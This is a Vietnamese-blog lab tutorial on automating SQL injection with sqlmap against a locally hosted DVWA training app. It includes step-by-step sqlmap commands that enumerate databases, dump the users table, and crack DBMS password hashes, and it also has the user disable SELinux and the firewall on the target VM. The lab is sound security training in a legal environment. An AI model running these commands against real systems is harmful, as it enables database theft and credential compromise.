Hướng Dẫn Thực Hành - Automate SQL Injection with SqlMap (DVWA): Lesson 7

Section 0. Background Information

What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
What is sqlmap?
- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Pre-Requisite Labs

References
- http://sqlmap.sourceforge.net/doc/README.html#s1
Lab Notes
- In this lab we will do the following:
  1. We will use sqlmap to obtain the following pieces of information:
    1. A list of Database Management Usernames and Passwords.
    2. A list of databases
    3. A list of tables for a specified database
    4. A list of users and passwords for a specified database table.

Legal Disclaimer

Section 1. Configure Fedora14 Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit BackTrack Virtual Machine Settings
- Instructions:
  1. Highlight fedora14
  2. Click Edit virtual machine settings
Edit Network Adapter

Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.

Section 2. Login to Fedora14

Start Fedora14 VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select Fedora14
  3. Play virtual machine
Login to Fedora14
- Instructions:
  1. Login: student
  2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address

Start a Terminal Console
- Instructions:
  1. Applications --> Terminal
Switch user to root
- Instructions:
  1. su - root
  2. <Whatever you set the root password to>
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.106.
  - Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall

Start a Terminal Console
- Instructions:
  1. sestatus
  2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
  3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
- Notes:
  - In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
Place selinux in permissive mode
- Instructions:
  1. echo 0 > /selinux/enforce
    - Placing a "0" in the enforce file, puts selinux in permissive mode.
  2. sestatus
    - Notice that "Current mode:" changed to permissive.
Disable Firewall
- Instructions:
  1. service iptables save
    - This is not really necessary, unless you have made recent changes to the firewall.
  2. service iptables stop
    - This command disables the firewall.

Section 5. Configure BackTrack Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit BackTrack Virtual Machine Settings
- Instructions:
  1. Highlight BackTrack5R1
  2. Click Edit virtual machine settings
Edit Network Adapter
- Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Do not Click on the OK Button.

Section 6. Login to BackTrack

Start BackTrack VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select BackTrack5R1
  3. Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx

Section 7. Open Console Terminal and Retrieve IP Address

Open a console terminal
- Instructions:
  1. Click on the console terminal
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.105.
  - Please record your IP address.

Section 8. Login to DVWA

Start Firefox
- Instructions:
  1. Click on Firefox
Login to DVWA
- Instructions:
  1. Start up Firefox on BackTrack
  2. Place http://192.168.1.106/dvwa/login.php in the address bar.
    - Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
  3. Login: admin
  4. Password: password
  5. Click on Login

Section 9. Set Security Level

Set DVWA Security Level
- Instructions:
  1. Click on DVWA Security, in the left hand menu.
  2. Select "low"
  3. Click Submit

Section 10. Obtain PHP Cookie

SQL Injection Menu
- Instructions:
  1. Select "SQL Injection" from the left navigation menu.
Select Tamper Data
- Instructions:
  1. Tools --> Tamper Data
Start Tamper Data
- Instructions:
  1. Click on Start Tamper
Basic Injection
- Instructions:
  1. Input "1" into the text box.
  2. Click Submit.
- Note:
  - The goal here is see the GET request being made to the CGI program behind the scenes.
  - Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.
Tamper with request?
- Instructions:
  1. Make sure the Continue Tampering? textbox is unchecked.
  2. Then Click Submit
Copying the Referer URL
- Instructions:
  1. Select the second GET Request
  2. Right Click on the Referer Link
  3. Select Copy
Open Notepad
- Instructions:
  1. Applications --> Wine --> Programs --> Accessories --> Notepad
Paste Referer URL into Notepad
- Instructions:
  1. Edit --> Paste
Copying the Cookie Information
- Instructions:
  1. Right Click on the Cookie line
  2. Select Copy
Pasting the Cookie Information
- Instructions:
  1. Edit --> Paste
- Notes:
  - Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

Section 11. Using SqlMap to Obtain Current User and Database

Verify sqlmap.py exists
- Instructions:
  1. cd /pentest/database/sqlmap
  2. ls -l sqlmap.py
Obtain Database User For DVWA
- Note:
  1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
  2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - -b, Retrieve DBMS banner
    - --current-db, Retrieve DBMS current database
    - --current-user, Retrieve DBMS current user
Do you want to keep testing?
- Instructions:
  1. keep testing? y
  2. skip payloads? y
Viewing Results
- Instructions:
  1. For the web application DVWA, the database name is "dvwa" and the programs that communicate with the database is "root@localhost";

Section 12. Using SqlMap to Obtain Database Management Username and Password

NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.

Obtain Database Management Username and Password
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - -string, Provide a string set that is always present after valid or invalid query.
    - --users, list database management system users
    - --password, list database management password for system users.
Obtain Database Management Username and Password (Part 2)
- Instructions:
  1. Use Dictionary Attack? Y
  2. Dictionary Location? <Press Enter>
- Notes:
  1. Notice the password for username db_hacker was cracked.
Obtain db_hacker Database Privileges
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - -U, Specify database management user
    - --privileges, list database management system user's privileges
View Results: Obtain db_hacker Database Privileges
- Instructions:
  1. Notice that DBMS user "db_hacker" has administrative privileges
  2. Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.

Section 13. Obtain a list of all Databases

Obtain a list of all databases
- Note:
  1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
  2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - --dbs, List database management system's databases.
Review Results: Obtain a list of all databases
- Note:
  1. Notice that sqlmap supplies a list of available databases.

Section 14. Obtain "dvwa" tables and contents

Obtain "dvwa" tables and contents
- Note:
  1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
  2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - -D, Specify Database
    - --tables, List Database Tables
Viewing "dvwa" tables and content results
- Note:
  1. Notice sqlmap listed two tables: guestbook and users.
Obtain columns for table dvwa.users
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - -D, Specify Database
    - -T, Specify the Database Table
    - --columns, List the Columns of the Database Table.
Viewing Results: columns for table dvwa.users
- Note:
  1. Notice that there are both a user and password columns in the dvwa.users table.
Obtain Users and their Passwords from table dvwa.users (Part 1)
- Instructions:
  1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
    - -u, Target URL
    - --cookie, HTTP Cookie header
    - -D, Specify Database
    - -C, List user and password columns
    - --dump, Dump table contents
Obtain Users and their Passwords from table dvwa.users (Part 2)
- Instructions:
  1. Do you want to use the LIKE operator? Y
  2. Recognize possible HASH values? Y
  3. What's the dictionary location? <Press Enter>
  4. Use common password suffixes? y
Review Results: Users and their Passwords from table dvwa.users
- Notes:
  1. Notice how sqlmap nicely displays passwords for each user.

Section 15. Proof of Lab Using John the Ripper

Proof of Lab
- Instructions:
  1. Bring up a new terminal, see (Section 7, Step 1)
  2. cd /pentest/database/sqlmap
  3. find output/* -print | xargs ls -l
  4. date
  5. echo "Your Name"
    - Replace the string "Your Name" with your actual name.
    - e.g., echo "John Gray"
- Proof of Lab Instructions:
  1. Do a <PrtScn>
  2. Paste into a word document
  3. Email 2 CSIRT247@Gmail.Com

Security lab

Tìm kiếm Blog này

Hướng Dẫn Thực Hành - Automate SQL Injection with SqlMap (DVWA): Lesson 7

Nhãn

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Metasploitable 2 vulnerability assessment

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab